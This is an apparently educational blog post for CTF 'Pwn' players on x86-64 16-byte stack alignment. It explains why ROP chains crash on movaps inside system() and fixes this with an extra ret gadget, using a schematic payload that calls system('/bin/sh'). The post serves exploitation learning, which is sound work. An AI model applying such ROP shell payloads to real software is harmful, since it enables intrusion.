16-Byte Alignment

By Vesper Vei
4 minutes read

Table of Contents

  1. 16-Byte Alignment
    1. 1. Why does this rule exist? (Hardware’s “OCD”)
    2. 2. The “dynamic changes” of 16-byte alignment
    3. 3. A Pwn player’s nightmare: the alignment pit in a ROP chain
    4. 4. The ultimate remedy: add one more ret
    5. 5. How do you identify it while debugging?
    6. Summary Notes

16-Byte Alignment

In the world of Pwn, 16-byte alignment (Stack Alignment) is absolutely a beginner’s “number one killer.” You may have built a perfect ROP chain with flawless logic, yet when running locally or attacking remotely, the program mysteriously crashes directly with SIGSEGV (segmentation fault) inside system or printf.

It feels like you prepared a master key, only to find the lock won’t open because the core is off by 1 millimeter.


1. Why does this rule exist? (Hardware’s “OCD”)

This rule comes from the x86-64 SSE (Streaming SIMD Extensions) instruction set. For maximum performance, when the CPU processes 128-bit (16-byte) data (such as floating-point operations), it uses instructions like movaps (Move Aligned Packed Single-Precision Floating-Point Values).


2. The “dynamic changes” of 16-byte alignment

This is the part that most easily confuses people. According to the System V ABI standard:

Before executing the call instruction, the stack pointer RSP must be 16-byte aligned.

Let’s track how the stack changes:

  1. Before the call: RSP = 0x...00 (16-byte aligned, address ending in 0).

  2. Execute call: The CPU automatically pushes the return address (8 bytes) onto the stack.

    • At this point, RSP becomes 0x...F8 (no longer a multiple of 16, offset by 8 bytes).
  3. Enter the function body: The first instruction of the function is usually push rbp.

    • At this point, RSP becomes 0x...F0 (hey! back to being a multiple of 16).

Conclusion: While executing logic inside the function body, the compiler assumes by default that RSP is aligned. But if you jump directly to the start of the function by special means (such as ROP), the situation is different.


3. A Pwn player’s nightmare: the alignment pit in a ROP chain

When you build a ROP chain, you are effectively manually “stitching together” return addresses.

Typical failure case:

You found the address of system and prepared pop rdi; ret for argument passing. Your payload looks like this:

[padding] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]

In this process, you skip the normal call flow and jump directly into system via ret. If at this moment your RSP happens to be sitting at an “awkward” position (for example, ending in 8 instead of 0), then as soon as system executes movaps internally, it will crash immediately.


4. The ultimate remedy: add one more ret

If you find that your ROP chain crashes when calling system, and debugging shows it dies on movaps, the simplest black magic is: before calling the target function, insert a useless ret instruction.

Fixed payload:

[padding] + [ret_gadget] + [pop rdi; ret] + [/bin/sh_addr] + [system_addr]


5. How do you identify it while debugging?

In GDB (for example, using the pwndbg plugin), when you crash:

  1. Look at the instruction where it crashed. If it is something like movaps XMMWORD PTR [rsp+...], xmm....
  2. Check the value of RSP. If the last digit of the address is not 0 (for example, it is 8).
  3. Case closed: this is a 16-byte alignment problem.

Summary Notes

StateRSP StateNotes
Before a standard CallMust be aligned (ends in 0)Mandatory ABI requirement
After executing CallUnaligned (ends in 8)Because an 8-byte return address was pushed
Crash after ROP jumpUsually ends in 8Causes SIMD instructions inside system to fail
Alignment strategyAdd one ret instructionForce a shift by 8 bytes to cancel the offset

Now you understand why sometimes your payload logic is completely correct, yet you still need to mysteriously add one more ret to make it work, right? Do you want to look at an actual piece of assembly code that causes this kind of crash for this alignment issue, or are you already ready to talk about the “ultimate trick” involving printf variadic arguments and registers?


Relationship Graph

Loading graph...